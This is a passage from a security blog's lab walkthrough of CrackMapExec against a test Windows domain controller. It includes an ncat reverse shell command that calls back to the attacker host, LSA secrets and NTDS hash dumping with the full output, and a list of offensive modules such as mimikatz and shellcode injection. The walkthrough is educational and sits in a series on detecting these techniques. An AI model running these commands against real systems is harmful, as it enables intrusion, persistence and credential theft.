Nice!! Let's wrap up this "ncat.exe" portion by getting a reverse shell to be sent to us from the domain controller which we just uploaded the "ncat.exe" to. Let's first setup our listener on our Kali (attacking machine). We will use port 443 which is typically encrypted. However, in this case we will not encrypt the traffic as in another post we will look at the packet analysis of all this activity.
Here is our "ncat" listener on our attacking machine. As you may notice below, it is listening on both IPv4 (0.0.0.0:443) and IPv6 (:::443).
root@securitynik:/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443
Now let's execute "ncat.exe" on the remote domain controller via CrackMapExec
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 -x "c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443" --exec-method smbexec CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) [*] KTHXBYE!
Now it's time to test if we were able to successfully execute "ncat.exe" on the remote device. If we did, we should now have a shell on our attacking machine. Let's see if we were blessed with a shell.
root@securitynik:~/cme# ncat --verbose --listen 443 --keep-open --max-conns 1 --nodns Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 10.0.0.105. Ncat: Connection from 10.0.0.105:50602. Microsoft Windows [Version 10.0.17763.253] (c) 2018 Microsoft Corporation. All rights reserved. C:\>whoami whoami securitynik\administrator C:\>net users net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest krbtgt nakia neysa nik Prague saadia securitynik The command completed with one or more errors. C:\>exit
What do you know, we see above we have a shell with system level privileges. Obviously, now that we have this access we can go crazy. However, I will leave it here as I'm still trying to learn more about CrackMapExec. Considering the above, we could have even configured a schedule tasks to ensure the shell is sent to us on a daily basis at a certain time.
Let's move on to something different. Let's first look at grabbing credentials from the LSA process.
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --lsa CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping LSA Secrets CME 10.0.0.105:445 SECNIK-2K19 SECURITYNIK\SECNIK-2K19$:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7::: CME 10.0.0.105:445 SECNIK-2K19 DPAPI_SYSTEM:010000004cfe7f1570df81dc0106e97aa01a607494b3b79a2c6c1d5c51fa01f8dcfee4433a922b2cc3e661aa CME 10.0.0.105:445 SECNIK-2K19 NL$KM:4464bf81f673d67d247f4b7154892396524ee8d8605a42bbbc54901af2b62beb606815c92c17f71ecf7fbe14a476e0d9ca3f27570a51b2a9c8457664842d9094 [*] KTHXBYE!
Let's go further with credentials and see if we can dump the NTDS database. It seems, we have two methods to achieve this. The first is leveraging volume shadow copy (VSS) or DRSUAPI. The DRSUAPI is the faster and recommended method for this tool.
Since I've used other tools such as Metasploit in my book (Learning By Practicing - Hack & Detect: Leveraging the Cyber Kill Chain for Practical Hacking and its Detection via Network Forensics) to grab credentials from AD via VSS, I will try this DRSUAPI method.
On a side note, drsuapi is a protocol which is used to implement the Directory Replication Services (DRS) Remote Protocol. Think Active Diretory with multiple domain controllers needing to replicate data so all Domains Controllers are in sync and up-to-date.
Now that we are aware of what DRSUAPI is, let's get back to dumping
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --ntds drsuapi CME 10.0.0.105:445 SECNIK-2K19 [*] Windows 10.0 Build 17763 (name:SECNIK-2K19) (domain:SECURITYNIK) CME 10.0.0.105:445 SECNIK-2K19 [+] SECURITYNIK\administrator:Testing1 (Pwn3d!) CME 10.0.0.105:445 SECNIK-2K19 [+] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) CME 10.0.0.105:445 SECNIK-2K19 [+] Using the DRSUAPI method to get NTDS.DIT secrets CME 10.0.0.105:445 SECNIK-2K19 Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: CME 10.0.0.105:445 SECNIK-2K19 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c82d13d85e7f4d04b8614295063c1e28::: CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\nakia:1103:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\neysa:1104:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\securitynik:1105:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\saadia:1106:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 securitynik.local\nik:1107:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 Prague:1110:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026::: CME 10.0.0.105:445 SECNIK-2K19 SECNIK-2K19$:1000:aad3b435b51404eeaad3b435b51404ee:7683fb6c93f423dddeaab188cec6c4d7:::
Before we close this out, let's take a look at some of the available modules:
root@securitynik:/cme# crackmapexec 10.0.0.105 -u administrator -p Testing1 --list-modules [*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it [*] mimikittenz Executes Mimikittenz [*] rundll32_exec Executes a command using rundll32 and Windows's native javascript interpreter [*] shellinject Downloads the specified raw shellcode and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script [*] com_exec Executes a command using a COM scriptlet to bypass whitelisting [*] enum_chrome Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords [*] tokens Enumerates available tokens using Powersploit's Invoke-TokenManipulation [*] mimikatz Executes PowerSploit's Invoke-Mimikatz.ps1 script [*] powerview Wrapper for PowerView's functions [*] peinject Downloads the specified DLL/EXE and injects it into memory using PowerSploit's Invoke-ReflectivePEInjection.ps1 script [*] tokenrider Allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials [*] metinject Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script [*] eventvwr_bypass Executes a command using the eventvwr.exe fileless UAC bypass
This post is already a bit longer than I had planned. In another post I will look into using some of the other modules
References:
https://ptestmethod.readthedocs.io/en/latest/cme.html
https://www.securenetworkinc.com/news/2017/8/22/crackmapexec-the-greatest-tool-youve-never-heard-of
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec-cheatsheet/
https://offensivesec.blogspot.com/2016/01/crackmapexec-swiss-army-knife-for_92.html
https://www.n00py.io/2017/10/detecting-crackmapexec-cme-with-bro-sysmon-and-powershell-logs/
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Credentials
https://nmap.org/ncat/guide/ncat-ssl.html
https://wiki.samba.org/index.php/DRSUAPI
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/58f33216-d9f1-43bf-a183-87e3c899c410
https://www.samba.org/~metze/presentations/2007/metze_sambaxp2007_drsuapi_repl.pdf
https://adsecurity.org/?p=1729
https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
https://adsecurity.org/?p=1760
https://adsecurity.org/?page_id=1821
https://alpymarinos.wordpress.com/2016/01/06/mimikatz/
https://blog.nviso.be/2018/01/09/windows-credential-guard-mimikatz/
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
No comments:
Post a Comment